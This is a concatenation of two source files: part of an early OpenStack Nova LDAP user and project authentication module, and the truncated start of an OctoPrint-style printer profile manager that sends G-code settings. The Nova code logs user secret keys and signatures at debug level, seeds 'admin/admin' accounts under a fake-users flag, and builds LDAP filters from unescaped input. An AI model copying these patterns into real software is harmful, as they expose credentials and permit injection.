return "KeyPair('%s', '%s', '%s', '%s')" % (self.id, self.owner_id, self.public_key, self.fingerprint)
class Group(AuthBase):
"""id and name are currently the same"""
def __init__(self, id, description = None, member_ids = None):
self.id = id
self.name = id
self.description = description
self.member_ids = member_ids
def has_member(self, user):
return User.safe_id(user) in self.member_ids
def __repr__(self):
return "Group('%s', '%s', %s)" % (self.id, self.description, self.member_ids)
class Project(Group):
def __init__(self, id, project_manager_id, description, member_ids):
self.project_manager_id = project_manager_id
super(Project, self).__init__(id, description, member_ids)
self.keeper = datastore.Keeper(prefix="project-")
@property
def project_manager(self):
return UserManager.instance().get_user(self.project_manager_id)
def has_manager(self, user):
return User.safe_id(user) == self.project_manager_id
def add_role(self, user, role):
return UserManager.instance().add_role(user, role, self)
def remove_role(self, user, role):
return UserManager.instance().remove_role(user, role, self)
def has_role(self, user, role):
return UserManager.instance().has_role(user, role, self)
@property
def vpn_port(self):
port_map = self.keeper['vpn_ports']
if not port_map: port_map = {}
if not port_map.has_key(self.id):
ports = port_map.values()
if len(ports) > 0:
port_map[self.id] = max(ports) + 1
else:
port_map[self.id] = 8000
self.keeper['vpn_ports'] = port_map
return self.keeper['vpn_ports'][self.id]
@property
def vpn_ip(self):
return FLAGS.vpn_ip
def get_credentials(self, user):
if not isinstance(user, User):
user = UserManager.instance().get_user(user)
rc = user.generate_rc(self.id)
private_key, signed_cert = self.generate_x509_cert(user)
configfile = open(FLAGS.vpn_client_template,"r")
s = string.Template(configfile.read())
configfile.close()
config = s.substitute(keyfile=FLAGS.credential_key_file,
certfile=FLAGS.credential_cert_file,
ip=self.vpn_ip,
port=self.vpn_port)
tmpdir = tempfile.mkdtemp()
zf = os.path.join(tmpdir, "temp.zip")
zippy = zipfile.ZipFile(zf, 'w')
zippy.writestr(FLAGS.credential_rc_file, rc)
zippy.writestr(FLAGS.credential_key_file, private_key)
zippy.writestr(FLAGS.credential_cert_file, signed_cert)
zippy.writestr("nebula-client.conf", config)
zippy.writestr(FLAGS.ca_file, crypto.fetch_ca(self.id))
zippy.close()
with open(zf, 'rb') as f:
buffer = f.read()
shutil.rmtree(tmpdir)
return buffer
def generate_x509_cert(self, user):
return UserManager.instance().generate_x509_cert(user, self)
def __repr__(self):
return "Project('%s', '%s', '%s', %s)" % (self.id, self.project_manager_id, self.description, self.member_ids)
class UserManager(object):
def __init__(self):
if hasattr(self.__class__, '_instance'):
raise Exception('Attempted to instantiate singleton')
@classmethod
def instance(cls):
if not hasattr(cls, '_instance'):
inst = UserManager()
cls._instance = inst
if FLAGS.fake_users:
try:
inst.create_user('fake', 'fake', 'fake')
except: pass
try:
inst.create_user('user', 'user', 'user')
except: pass
try:
inst.create_user('admin', 'admin', 'admin', True)
except: pass
return cls._instance
def authenticate(self, access, signature, params, verb='GET', server_string='127.0.0.1:8773', path='/', verify_signature=True):
# TODO: Check for valid timestamp
(access_key, sep, project_name) = access.partition(':')
user = self.get_user_from_access_key(access_key)
if user == None:
raise exception.NotFound('No user found for access key')
if project_name is '':
project_name = user.name
project = self.get_project(project_name)
if project == None:
raise exception.NotFound('No project called %s could be found' % project_name)
if not user.is_admin() and not project.has_member(user):
raise exception.NotFound('User %s is not a member of project %s' % (user.id, project.id))
if verify_signature:
# hmac can't handle unicode, so encode ensures that secret isn't unicode
expected_signature = signer.Signer(user.secret.encode()).generate(params, verb, server_string, path)
logging.debug('user.secret: %s', user.secret)
logging.debug('expected_signature: %s', expected_signature)
logging.debug('signature: %s', signature)
if signature != expected_signature:
raise exception.NotAuthorized('Signature does not match')
return (user, project)
def has_role(self, user, role, project=None):
with LDAPWrapper() as conn:
if project and role == 'projectmanager':
return self.is_project_manager(user, project)
global_role = conn.has_role(User.safe_id(user),
role,
None)
if not global_role:
return global_role
if not project or role in FLAGS.global_roles:
return global_role
return conn.has_role(User.safe_id(user),
role,
Project.safe_id(project))
def add_role(self, user, role, project=None):
with LDAPWrapper() as conn:
return conn.add_role(User.safe_id(user), role, Project.safe_id(project))
def remove_role(self, user, role, project=None):
with LDAPWrapper() as conn:
return conn.remove_role(User.safe_id(user), role, Project.safe_id(project))
def create_project(self, name, manager_user, description=None, member_users=None):
if member_users:
member_users = [User.safe_id(u) for u in member_users]
with LDAPWrapper() as conn:
return conn.create_project(name, User.safe_id(manager_user), description, member_users)
def get_projects(self):
with LDAPWrapper() as conn:
return conn.find_projects()
def get_project(self, project):
with LDAPWrapper() as conn:
return conn.find_project(Project.safe_id(project))
def add_to_project(self, user, project):
with LDAPWrapper() as conn:
return conn.add_to_project(User.safe_id(user), Project.safe_id(project))
def is_project_manager(self, user, project):
if not isinstance(project, Project):
project = self.get_project(project)
return project.has_manager(user)
def is_project_member(self, user, project):
if isinstance(project, Project):
return project.has_member(user)
else:
with LDAPWrapper() as conn:
return conn.is_in_project(User.safe_id(user), project)
def remove_from_project(self, user, project):
with LDAPWrapper() as conn:
return conn.remove_from_project(User.safe_id(user), Project.safe_id(project))
def delete_project(self, project):
with LDAPWrapper() as conn:
return conn.delete_project(Project.safe_id(project))
def get_user(self, uid):
with LDAPWrapper() as conn:
return conn.find_user(uid)
def get_user_from_access_key(self, access_key):
with LDAPWrapper() as conn:
return conn.find_user_by_access_key(access_key)
def get_users(self):
with LDAPWrapper() as conn:
return conn.find_users()
def create_user(self, user, access=None, secret=None, admin=False, create_project=True):
if access == None: access = str(uuid.uuid4())
if secret == None: secret = str(uuid.uuid4())
with LDAPWrapper() as conn:
user = User.safe_id(user)
result = conn.create_user(user, access, secret, admin)
if create_project:
conn.create_project(user, user, user)
return result
def delete_user(self, user, delete_project=True):
with LDAPWrapper() as conn:
user = User.safe_id(user)
if delete_project:
try:
conn.delete_project(user)
except exception.NotFound:
pass
conn.delete_user(user)
def generate_key_pair(self, user, key_name):
# generating key pair is slow so delay generation
# until after check
user = User.safe_id(user)
with LDAPWrapper() as conn:
if not conn.user_exists(user):
raise exception.NotFound("User %s doesn't exist" % user)
if conn.key_pair_exists(user, key_name):
raise exception.Duplicate("The keypair %s already exists" % key_name)
private_key, public_key, fingerprint = crypto.generate_key_pair()
self.create_key_pair(User.safe_id(user), key_name, public_key, fingerprint)
return private_key, fingerprint
def create_key_pair(self, user, key_name, public_key, fingerprint):
with LDAPWrapper() as conn:
return conn.create_key_pair(User.safe_id(user), key_name, public_key, fingerprint)
def get_key_pair(self, user, key_name):
with LDAPWrapper() as conn:
return conn.find_key_pair(User.safe_id(user), key_name)
def get_key_pairs(self, user):
with LDAPWrapper() as conn:
return conn.find_key_pairs(User.safe_id(user))
def delete_key_pair(self, user, key_name):
with LDAPWrapper() as conn:
conn.delete_key_pair(User.safe_id(user), key_name)
def generate_x509_cert(self, user, project):
(private_key, csr) = crypto.generate_x509_cert(self.__cert_subject(User.safe_id(user)))
# TODO - This should be async call back to the cloud controller
signed_cert = crypto.sign_csr(csr, Project.safe_id(project))
return (private_key, signed_cert)
def __cert_subject(self, uid):
# FIXME(ja) - this should be pulled from a global configuration
return "/C=US/ST=California/L=MountainView/O=AnsoLabs/OU=NovaDev/CN=%s-%s" % (uid, str(datetime.datetime.utcnow().isoformat()))
class LDAPWrapper(object):
def __init__(self):
self.user = FLAGS.user_dn
self.passwd = FLAGS.ldap_password
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
#logging.info('type, value, traceback: %s, %s, %s', type, value, traceback)
self.conn.unbind_s()
return False
def connect(self):
""" connect to ldap as admin user """
if FLAGS.fake_users:
self.conn = fakeldap.initialize(FLAGS.ldap_url)
else:
assert(ldap.__name__ != 'fakeldap')
self.conn = ldap.initialize(FLAGS.ldap_url)
self.conn.simple_bind_s(self.user, self.passwd)
def find_object(self, dn, query = None):
objects = self.find_objects(dn, query)
if len(objects) == 0:
return None
return objects[0]
def find_objects(self, dn, query = None):
try:
res = self.conn.search_s(dn, ldap.SCOPE_SUBTREE, query)
except Exception:
return []
# just return the attributes
return [x[1] for x in res]
def find_users(self):
attrs = self.find_objects(FLAGS.user_ldap_subtree, '(objectclass=novaUser)')
return [self.__to_user(attr) for attr in attrs]
def find_key_pairs(self, uid):
attrs = self.find_objects(self.__uid_to_dn(uid), '(objectclass=novaKeyPair)')
return [self.__to_key_pair(uid, attr) for attr in attrs]
def find_projects(self):
attrs = self.find_objects(FLAGS.project_ldap_subtree, '(objectclass=novaProject)')
return [self.__to_project(attr) for attr in attrs]
def find_roles(self, tree):
attrs = self.find_objects(tree, '(&(objectclass=groupOfNames)(!(objectclass=NovaProject)))')
return [self.__to_group(attr) for attr in attrs]
def find_groups_with_member(self, tree, dn):
attrs = self.find_objects(tree, '(&(objectclass=groupOfNames)(member=%s))' % dn )
return [self.__to_group(attr) for attr in attrs]
def find_user(self, uid):
attr = self.find_object(self.__uid_to_dn(uid), '(objectclass=novaUser)')
return self.__to_user(attr)
def find_key_pair(self, uid, key_name):
dn = 'cn=%s,%s' % (key_name,
self.__uid_to_dn(uid))
attr = self.find_object(dn, '(objectclass=novaKeyPair)')
return self.__to_key_pair(uid, attr)
def find_group(self, dn):
"""uses dn directly instead of custructing it from name"""
attr = self.find_object(dn, '(objectclass=groupOfNames)')
return self.__to_group(attr)
def find_project(self, name):
dn = 'cn=%s,%s' % (name,
FLAGS.project_ldap_subtree)
attr = self.find_object(dn, '(objectclass=novaProject)')
return self.__to_project(attr)
def user_exists(self, name):
return self.find_user(name) != None
def key_pair_exists(self, uid, key_name):
return self.find_key_pair(uid, key_name) != None
def project_exists(self, name):
return self.find_project(name) != None
def group_exists(self, dn):
return self.find_group(dn) != None
def delete_key_pairs(self, uid):
keys = self.find_key_pairs(uid)
if keys != None:
for key in keys:
self.delete_key_pair(uid, key.name)
def create_user(self, name, access_key, secret_key, is_admin):
if self.user_exists(name):
raise exception.Duplicate("LDAP user %s already exists" % name)
attr = [
('objectclass', ['person',
'organizationalPerson',
'inetOrgPerson',
'novaUser']),
('ou', [FLAGS.user_unit]),
('uid', [name]),
('sn', [name]),
('cn', [name]),
('secretKey', [secret_key]),
('accessKey', [access_key]),
('isAdmin', [str(is_admin).upper()]),
]
self.conn.add_s(self.__uid_to_dn(name), attr)
return self.__to_user(dict(attr))
def create_project(self, name, manager_uid, description=None, member_uids=None):
if self.project_exists(name):
raise exception.Duplicate("Project can't be created because project %s already exists" % name)
if not self.user_exists(manager_uid):
raise exception.NotFound("Project can't be created because manager %s doesn't exist" % manager_uid)
manager_dn = self.__uid_to_dn(manager_uid)
# description is a required attribute
if description is None:
description = name
members = []
if member_uids != None:
for member_uid in member_uids:
if not self.user_exists(member_uid):
raise exception.NotFound("Project can't be created because user %s doesn't exist" % member_uid)
members.append(self.__uid_to_dn(member_uid))
# always add the manager as a member because members is required
if not manager_dn in members:
members.append(manager_dn)
attr = [
('objectclass', ['novaProject']),
('cn', [name]),
('description', [description]),
('projectManager', [manager_dn]),
('member', members)
]
self.conn.add_s('cn=%s,%s' % (name, FLAGS.project_ldap_subtree), attr)
return self.__to_project(dict(attr))
def add_to_project(self, uid, project_id):
dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
return self.add_to_group(uid, dn)
def remove_from_project(self, uid, project_id):
dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
return self.remove_from_group(uid, dn)
def is_in_project(self, uid, project_id):
dn = 'cn=%s,%s' % (project_id, FLAGS.project_ldap_subtree)
return self.is_in_group(uid, dn)
def __role_to_dn(self, role, project_id=None):
if project_id == None:
return FLAGS.__getitem__("ldap_%s" % role).value
else:
return 'cn=%s,cn=%s,%s' % (role, project_id, FLAGS.project_ldap_subtree)
def __create_group(self, group_dn, name, uid, description, member_uids = None):
if self.group_exists(name):
raise exception.Duplicate("Group can't be created because group %s already exists" % name)
members = []
if member_uids != None:
for member_uid in member_uids:
if not self.user_exists(member_uid):
raise exception.NotFound("Group can't be created because user %s doesn't exist" % member_uid)
members.append(self.__uid_to_dn(member_uid))
dn = self.__uid_to_dn(uid)
if not dn in members:
members.append(dn)
attr = [
('objectclass', ['groupOfNames']),
('cn', [name]),
('description', [description]),
('member', members)
]
self.conn.add_s(group_dn, attr)
return self.__to_group(dict(attr))
def has_role(self, uid, role, project_id=None):
role_dn = self.__role_to_dn(role, project_id)
return self.is_in_group(uid, role_dn)
def add_role(self, uid, role, project_id=None):
role_dn = self.__role_to_dn(role, project_id)
if not self.group_exists(role_dn):
# create the role if it doesn't exist
description = '%s role for %s' % (role, project_id)
self.__create_group(role_dn, role, uid, description)
else:
return self.add_to_group(uid, role_dn)
def remove_role(self, uid, role, project_id=None):
role_dn = self.__role_to_dn(role, project_id)
try:
return self.remove_from_group(uid, role_dn)
except Exception, ex:
print type(ex), ex
def is_in_group(self, uid, group_dn):
if not self.user_exists(uid):
raise exception.NotFound("User %s can't be searched in group becuase the user doesn't exist" % (uid,))
if not self.group_exists(group_dn):
return False
res = self.find_object(group_dn,
'(member=%s)' % self.__uid_to_dn(uid))
return res != None
def add_to_group(self, uid, group_dn):
if not self.user_exists(uid):
raise exception.NotFound("User %s can't be added to the group becuase the user doesn't exist" % (uid,))
if not self.group_exists(group_dn):
raise exception.NotFound("The group at dn %s doesn't exist" % (group_dn,))
if self.is_in_group(uid, group_dn):
raise exception.Duplicate("User %s is already a member of the group %s" % (uid, group_dn))
attr = [
(ldap.MOD_ADD, 'member', self.__uid_to_dn(uid))
]
self.conn.modify_s(group_dn, attr)
def remove_from_group(self, uid, group_dn):
if not self.group_exists(group_dn):
raise exception.NotFound("The group at dn %s doesn't exist" % (group_dn,))
if not self.user_exists(uid):
raise exception.NotFound("User %s can't be removed from the group because the user doesn't exist" % (uid,))
if not self.is_in_group(uid, group_dn):
raise exception.NotFound("User %s is not a member of the group" % (uid,))
attr = [
(ldap.MOD_DELETE, 'member', self.__uid_to_dn(uid))
]
try:
self.conn.modify_s(group_dn, attr)
except ldap.OBJECT_CLASS_VIOLATION:
logging.debug("Attempted to remove the last member of a group. Deleting the group instead.")
self.delete_group(group_dn)
def remove_from_all(self, uid):
# FIXME(vish): what if deleted user is a project manager?
if not self.user_exists(uid):
raise exception.NotFound("User %s can't be removed from all because the user doesn't exist" % (uid,))
dn = self.__uid_to_dn(uid)
attr = [
(ldap.MOD_DELETE, 'member', dn)
]
roles = self.find_groups_with_member(FLAGS.role_ldap_subtree, dn)
for role in roles:
self.conn.modify_s('cn=%s,%s' % (role.id, FLAGS.role_ldap_subtree), attr)
projects = self.find_groups_with_member(FLAGS.project_ldap_subtree, dn)
for project in projects:
self.conn.modify_s('cn=%s,%s' % (project.id, FLAGS.project_ldap_subtree), attr)
def create_key_pair(self, uid, key_name, public_key, fingerprint):
"""create's a public key in the directory underneath the user"""
# TODO(vish): possibly refactor this to store keys in their own ou
# and put dn reference in the user object
attr = [
('objectclass', ['novaKeyPair']),
('cn', [key_name]),
('sshPublicKey', [public_key]),
('keyFingerprint', [fingerprint]),
]
self.conn.add_s('cn=%s,%s' % (key_name,
self.__uid_to_dn(uid)),
attr)
return self.__to_key_pair(uid, dict(attr))
def find_user_by_access_key(self, access):
query = '(accessKey=%s)' % access
dn = FLAGS.user_ldap_subtree
return self.__to_user(self.find_object(dn, query))
def delete_user(self, uid):
if not self.user_exists(uid):
raise exception.NotFound("User %s doesn't exist" % uid)
self.delete_key_pairs(uid)
self.remove_from_all(uid)
self.conn.delete_s('uid=%s,%s' % (uid,
FLAGS.user_ldap_subtree))
def delete_key_pair(self, uid, key_name):
if not self.key_pair_exists(uid, key_name):
raise exception.NotFound("Key Pair %s doesn't exist for user %s" %
(key_name, uid))
self.conn.delete_s('cn=%s,uid=%s,%s' % (key_name, uid,
FLAGS.user_ldap_subtree))
def delete_group(self, group_dn):
if not self.group_exists(group_dn):
raise exception.NotFound("Group at dn %s doesn't exist" % group_dn)
self.conn.delete_s(group_dn)
def delete_roles(self, project_dn):
roles = self.find_roles(project_dn)
if roles != None:
for role in roles:
self.delete_group('cn=%s,%s' % (role.id, project_dn))
def delete_project(self, name):
project_dn = 'cn=%s,%s' % (name, FLAGS.project_ldap_subtree)
self.delete_roles(project_dn)
self.delete_group(project_dn)
def __to_user(self, attr):
if attr == None:
return None
return User(
id = attr['uid'][0],
name = attr['cn'][0],
access = attr['accessKey'][0],
secret = attr['secretKey'][0],
admin = (attr['isAdmin'][0] == 'TRUE')
)
def __to_key_pair(self, owner, attr):
if attr == None:
return None
return KeyPair(
id = attr['cn'][0],
owner_id = owner,
public_key = attr['sshPublicKey'][0],
fingerprint = attr['keyFingerprint'][0],
)
def __to_group(self, attr):
if attr == None:
return None
member_dns = attr.get('member', [])
return Group(
id = attr['cn'][0],
description = attr.get('description', [None])[0],
member_ids = [self.__dn_to_uid(x) for x in member_dns]
)
def __to_project(self, attr):
if attr == None:
return None
member_dns = attr.get('member', [])
return Project(
id = attr['cn'][0],
project_manager_id = self.__dn_to_uid(attr['projectManager'][0]),
description = attr.get('description', [None])[0],
member_ids = [self.__dn_to_uid(x) for x in member_dns]
)
def __dn_to_uid(self, dn):
return dn.split(',')[0].split('=')[1]
def __uid_to_dn(self, dn):
return 'uid=%s,%s' % (dn, FLAGS.user_ldap_subtree)
| sorenh/cc | nova/auth/users.py | Python | apache-2.0 | 32,614 |
# coding=utf-8
from __future__ import absolute_import
__author__ = "Gina Häußge <osd@foosel.net>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
__copyright__ = "Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License"
import os
import copy
import re
from octoprint.settings import settings
from octoprint.util import dict_merge, dict_clean
#lkj
from octoprint.comm.protocol.reprap.util import GcodeCommand
class SaveError(Exception):
pass
class MachineType(object):
XYZ = "XYZ"
Delta = "Delta"
CoreXY = "CoreXY"
class BedTypes(object):
RECTANGULAR = "rectangular"
CIRCULAR = "circular"
class PrinterProfileManager(object):
#lkj
COMMAND_Finish_sending_M910 = GcodeCommand("M910")
COMMAND_Has_bed_M908 = staticmethod(lambda s: GcodeCommand("M908", s=s))
COMMAND_Steps_per_unit_M92 = staticmethod(lambda x, y, z, e: GcodeCommand("M92", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Maximum_area_unit_M520 = staticmethod(lambda x, y, z: GcodeCommand("M520", x=x if x else None, y=y if y else None, z=z if z else None))
COMMAND_Homing_direction_M525 = staticmethod(lambda x, y, z: GcodeCommand("M525", x=x, y=y, z=z))
COMMAND_Home_offset_M206_T0 = staticmethod(lambda s, t, x, y, z: GcodeCommand("M206", s=s, t=t, x=x, y=y, z=z))
#COMMAND_Home_offset_M206_T1 = staticmethod(lambda x, y, z: GcodeCommand("M206", x=x if x else None, y=y if y else None, z=z if z else None))
COMMAND_Axis_invert_M510 = staticmethod(lambda x, y, z, e: GcodeCommand("M510", x=x, y=y, z=z, e=e))
COMMAND_Stepper_current_M906 = staticmethod(lambda x, y, z, e, b: GcodeCommand("M906", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None, b=b if b else None))
COMMAND_Stepper_mircostep_M909 = staticmethod(lambda x, y, z, e, b: GcodeCommand("M909", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None, b=b if b else None))
COMMAND_Endstop_invert_M526 = staticmethod(lambda x, y, z: GcodeCommand("M526", x=x, y=y, z=z))
COMMAND_Minimum_endstop_input_M523 = staticmethod(lambda x, y, z: GcodeCommand("M523", x=x , y=y , z=z))
COMMAND_Maximum_endstop_input_M524 = staticmethod(lambda x, y, z: GcodeCommand("M524", x=x, y=y, z=z))
COMMAND_Use_software_endstop_M522 = staticmethod(lambda i, a: GcodeCommand("M522", i=i, a=a))
COMMAND_Retract_length_M207 = staticmethod(lambda s, f, z: GcodeCommand("M207", s=s if s else None, f=f if f else None, z=z if z else None))
COMMAND_Retract_recover_length_M208 = staticmethod(lambda s, f: GcodeCommand("M208", s=s if s else None, f=f if f else None))
COMMAND_Maximum_feedrates_M203 = staticmethod(lambda x, y, z, e: GcodeCommand("M203", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Homing_feedrate_M210 = staticmethod(lambda x, y, z, e: GcodeCommand("M210", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Maximum_acceleration_M201 = staticmethod(lambda x, y, z, e: GcodeCommand("M201", x=x if x else None, y=y if y else None, z=z if z else None, e=e if e else None))
COMMAND_Acceleration_M204 = staticmethod(lambda s, t: GcodeCommand("M204", s=s if s else None, t=t if t else None))
COMMAND_Advanced_variables_M205 = staticmethod(lambda s, t, x, z, e: GcodeCommand("M205", s=s if s else None, t=t if t else None, x=x if x else None, z=z if z else None, e=e if e else None))
COMMAND_TEMPETURE_PID_M301 = staticmethod(lambda t, p, i, d, s, b, w: GcodeCommand("M301", t=t, p=p, i=i, d=d, s=s, b=b, w=w))
COMMAND_DELTA_ARGS_M665 = staticmethod(lambda l, r, s, z: GcodeCommand("M665", l=l, r=r, s=s, z=z))
COMMAND_MACHINE_TYPE_M913 = staticmethod(lambda s: GcodeCommand("M913", s=s))
COMMAND_DYNAMIC_CURRENT_M911 = staticmethod(lambda s: GcodeCommand("M911", s=s))
COMMAND_BBP1_EXTENT_INTERFACE_M916 = staticmethod(lambda s,t: GcodeCommand("M916", s=s, t=t))
default = dict(
id = "_default",
name = "Default",
model = "Generic RepRap Printer",
color = "default",
volume=dict(
width = 200,
depth = 200,
height = 200,
formFactor = BedTypes.RECTANGULAR,
),
heatedBed = True,
dynamicCurrent = False,
machineType = MachineType.XYZ,
pids = dict(
t0 = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
t1 = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
bed = dict(p=10.0, i=0.5, d=0.0, limit=10.0, factor=0.033, offset=40.0),
),
delta_args = dict(
diagonal_rod = 250.0,
print_radius = 175.0,
z_home_pos = 33.0,
segments_per_second = 18.0,
),
extendInterface = 1,
thermocouple = 3,
extruder=dict(
count = 1,
offsets = [
dict(x=0.0, y=0.0,z=0.0)
#(0, 0, 0)
],
nozzleDiameter = 0.4
),
axes=dict(
x = dict(speed=500, inverted=True),
y = dict(speed=500, inverted=False),
z = dict(speed=5, inverted=True),
e = dict(speed=25, inverted=False)
),
#lkj
cmdPrintStart=[
dict(cmd="M80"),
dict(cmd="G28 X0 Y0"),
dict(cmd="G28 Z0"),
dict(cmd="G1 Z15.0 F6000"),
dict(cmd="M140 S60.0"),
dict(cmd="M104 T0 S200.0"),
dict(cmd="M109 T0 S200.0"),
dict(cmd="M190 S60.0")
# dict(cmd="G92 E0"),
# dict(cmd="G1 F600 E64"),
# dict(cmd="G92 E0")
],
cmdPrintStop=[
#dict(cmd="G28 X0 Y0"),
dict(cmd="M84 S1")
],
stepsPerUnit = dict(
x = 157.4804,
y = 157.4804,
z = 2133.33,
e = 304
),
homingDirection=dict(
x = False,
y = False,
z = False,
),
stepperCurrent = dict(
x = 800,
y = 800,
z = 450,
t0 = 450,
t1 = 450,
),
stepperMircostep = dict(
x = 32,
y = 32,
z = 32,
t0 = 32,
t1 = 32,
),
endstopInvert = dict(
x = False,
y = False,
z = False
),
endstopMinimumInput = dict(
x = True,
y = True,
z = True,
),
endstopMaxmumInput = dict(
x = True,
y = True,
z = True,
),
endstopUseSoftware = dict(
minVal = False,
maxVal = True,
),
retractLength = dict(
length = 3,
feedrate = 25,
zlift = 0,
),
retractRecoverLength = dict(
length = 2,
feedrate = 20,
),
homingFeedrates = dict(
x = 3000,
y = 3000,
z = 120,
e = 0,
),
accelerationMaximum = dict(
x = 9000,
y = 9000,
z = 100,
e = 10000,
),
accelerationMoveRetract = dict(
move = 4000,
retract= 3000,
),
advancedVariables = dict(
minimumfeedrate = 0,
mintravelfeedrate = 0,
maxXYJerk = 100,
maxZJerk = 0.4,
maxEJerk = 5.0,
)
)
def __init__(self):
self._current = None
self._folder = settings().getBaseFolder("printerProfiles")
def select(self, identifier):
#lkj
ret_select=False
if identifier is None or not self.exists(identifier):
self._current = self.get_default()
#return False
ret_select = False
else:
self._current = self.get(identifier)
#return True
ret_select = True
print("lkj, select a profile !!!!")
self.sendPreferenctParameter(self._current)
self.getBeforeAndAfterPrintParameter(self._current)
return ret_select
def deselect(self):
self._current = None
def get_all(self):
return self._load_all()
def get(self, identifier):
if identifier == "_default":
return self._load_default()
elif self.exists(identifier):
return self._load_from_path(self._get_profile_path(identifier))
else:
return None
def remove(self, identifier):
if identifier == "_default":
return False
if self._current is not None and self._current["id"] == identifier:
return False
return self._remove_from_path(self._get_profile_path(identifier))
def __send_all_update_epprom(self, profile):
#print("__send_all_update_epprom, profile=%s" % repr(profile))
cmds = []
if "heatedBed" in profile:
hasBed = 1
hasBed = profile["heatedBed"]
cmds.append(self.__class__.COMMAND_Has_bed_M908(hasBed))
if "stepsPerUnit" in profile:
x = profile["stepsPerUnit"]["x"]
y = profile["stepsPerUnit"]["y"]
z = profile["stepsPerUnit"]["z"]
e = profile["stepsPerUnit"]["e"]
cmds.append(self.__class__.COMMAND_Steps_per_unit_M92(x,y,z,e))
if "volume" in profile:
x = profile["volume"]["width"]
y = profile["volume"]["depth"]
z = profile["volume"]["height"]
cmds.append(self.__class__.COMMAND_Maximum_area_unit_M520(x,y,z))
'''
if "homingDirection" in profile:
x = profile["homingDirection"]["x"]
y = profile["homingDirection"]["y"]
z = profile["homingDirection"]["z"]
cmds.append(self.__class__.COMMAND_Homing_direction_M525(x,y,z))
'''
if "extruder" in profile:
offsets = profile["extruder"]["offsets"]
#print("lkj offsets:%s" %(str(offsets)))
s = profile["extruder"]["count"]
t = 0
#x,y,z = 0.0,0.0,0.0
for index in range(s):
x = offsets[index]["x"]
y = offsets[index]["y"]
z = offsets[index]["z"]
#print("lkj x:%s, y:%s, z:%s" %(str(x),str(y),str(z)))
cmds.append(self.__class__.COMMAND_Home_offset_M206_T0(s,t,x,y,z))
t += 1
'''
for offset in offsets:
if "x" in offset and offset["x"] is not None:
x = offset["x"]
y = offset["y"]
z = offset["z"]
#print("lkj x:%s, y:%s, z:%s" %(str(x),str(y),str(z)))
cmds.append(self.__class__.COMMAND_Home_offset_M206_T0(s,t,x,y,z))
t += 1
'''
if "axes" in profile:
x = profile["axes"]["x"]["inverted"]
y = profile["axes"]["y"]["inverted"]
z = profile["axes"]["z"]["inverted"]
e = profile["axes"]["e"]["inverted"]
cmds.append(self.__class__.COMMAND_Axis_invert_M510(x,y,z,e))
speed_x = profile["axes"]["x"]["speed"]
speed_y = profile["axes"]["y"]["speed"]
speed_z = profile["axes"]["z"]["speed"]
speed_e = profile["axes"]["e"]["speed"]
cmds.append(self.__class__.COMMAND_Maximum_feedrates_M203(speed_x,speed_y,speed_z,speed_e))
if "stepperCurrent" in profile:
x = profile["stepperCurrent"]["x"]
y = profile["stepperCurrent"]["y"]
z = profile["stepperCurrent"]["z"]
t0 = profile["stepperCurrent"]["t0"]
t1 = profile["stepperCurrent"]["t1"]
cmds.append(self.__class__.COMMAND_Stepper_current_M906(x,y,z,t0,t1))
if "stepperMircostep" in profile:
x = profile["stepperMircostep"]["x"]
y = profile["stepperMircostep"]["y"]
z = profile["stepperMircostep"]["z"]
t0 = profile["stepperMircostep"]["t0"]
t1 = profile["stepperMircostep"]["t1"]
cmds.append(self.__class__.COMMAND_Stepper_mircostep_M909(x,y,z,t0,t1))
'''
if "endstopInvert" in profile:
x = profile["endstopInvert"]["x"]
y = profile["endstopInvert"]["y"]
z = profile["endstopInvert"]["z"]
cmds.append(self.__class__.COMMAND_Endstop_invert_M526(x,y,z))
if "endstopMinimumInput" in profile:
x = profile["endstopMinimumInput"]["x"]
y = profile["endstopMinimumInput"]["y"]
z = profile["endstopMinimumInput"]["z"]
cmds.append(self.__class__.COMMAND_Minimum_endstop_input_M523(x,y,z))
if "endstopMaxmumInput" in profile:
x = profile["endstopMaxmumInput"]["x"]
y = profile["endstopMaxmumInput"]["y"]
z = profile["endstopMaxmumInput"]["z"]
cmds.append(self.__class__.COMMAND_Maximum_endstop_input_M524(x,y,z))
'''
if "endstopUseSoftware" in profile:
minVal = profile["endstopUseSoftware"]["minVal"]
maxVal = profile["endstopUseSoftware"]["maxVal"]
cmds.append(self.__class__.COMMAND_Use_software_endstop_M522(minVal,maxVal))
if "retractLength" in profile:
length = profile["retractLength"]["length"]
feedrate = profile["retractLength"]["feedrate"]
zlift = profile["retractLength"]["zlift"]
cmds.append(self.__class__.COMMAND_Retract_length_M207(length,feedrate,zlift))
if "retractRecoverLength" in profile:
length = profile["retractRecoverLength"]["length"]
feedrate = profile["retractRecoverLength"]["feedrate"]
cmds.append(self.__class__.COMMAND_Retract_recover_length_M208(length,feedrate))
if "homingFeedrates" in profile:
x = profile["homingFeedrates"]["x"]
y = profile["homingFeedrates"]["y"]
z = profile["homingFeedrates"]["z"]
e = profile["homingFeedrates"]["e"]
cmds.append(self.__class__.COMMAND_Homing_feedrate_M210(x,y,z,e))
if "accelerationMaximum" in profile:
x = profile["accelerationMaximum"]["x"]
y = profile["accelerationMaximum"]["y"]
z = profile["accelerationMaximum"]["z"]
e = profile["accelerationMaximum"]["e"]
cmds.append(self.__class__.COMMAND_Maximum_acceleration_M201(x,y,z,e))
if "accelerationMoveRetract" in profile:
move = profile["accelerationMoveRetract"]["move"]
retract = profile["accelerationMoveRetract"]["retract"]
cmds.append(self.__class__.COMMAND_Acceleration_M204(move,retract))
if "advancedVariables" in profile:
minimumfeedrate = profile["advancedVariables"]["minimumfeedrate"]
mintravelfeedrate = profile["advancedVariables"]["mintravelfeedrate"]
maxXYJerk = profile["advancedVariables"]["maxXYJerk"]
maxZJerk = profile["advancedVariables"]["maxZJerk"]
maxEJerk = profile["advancedVariables"]["maxEJerk"]
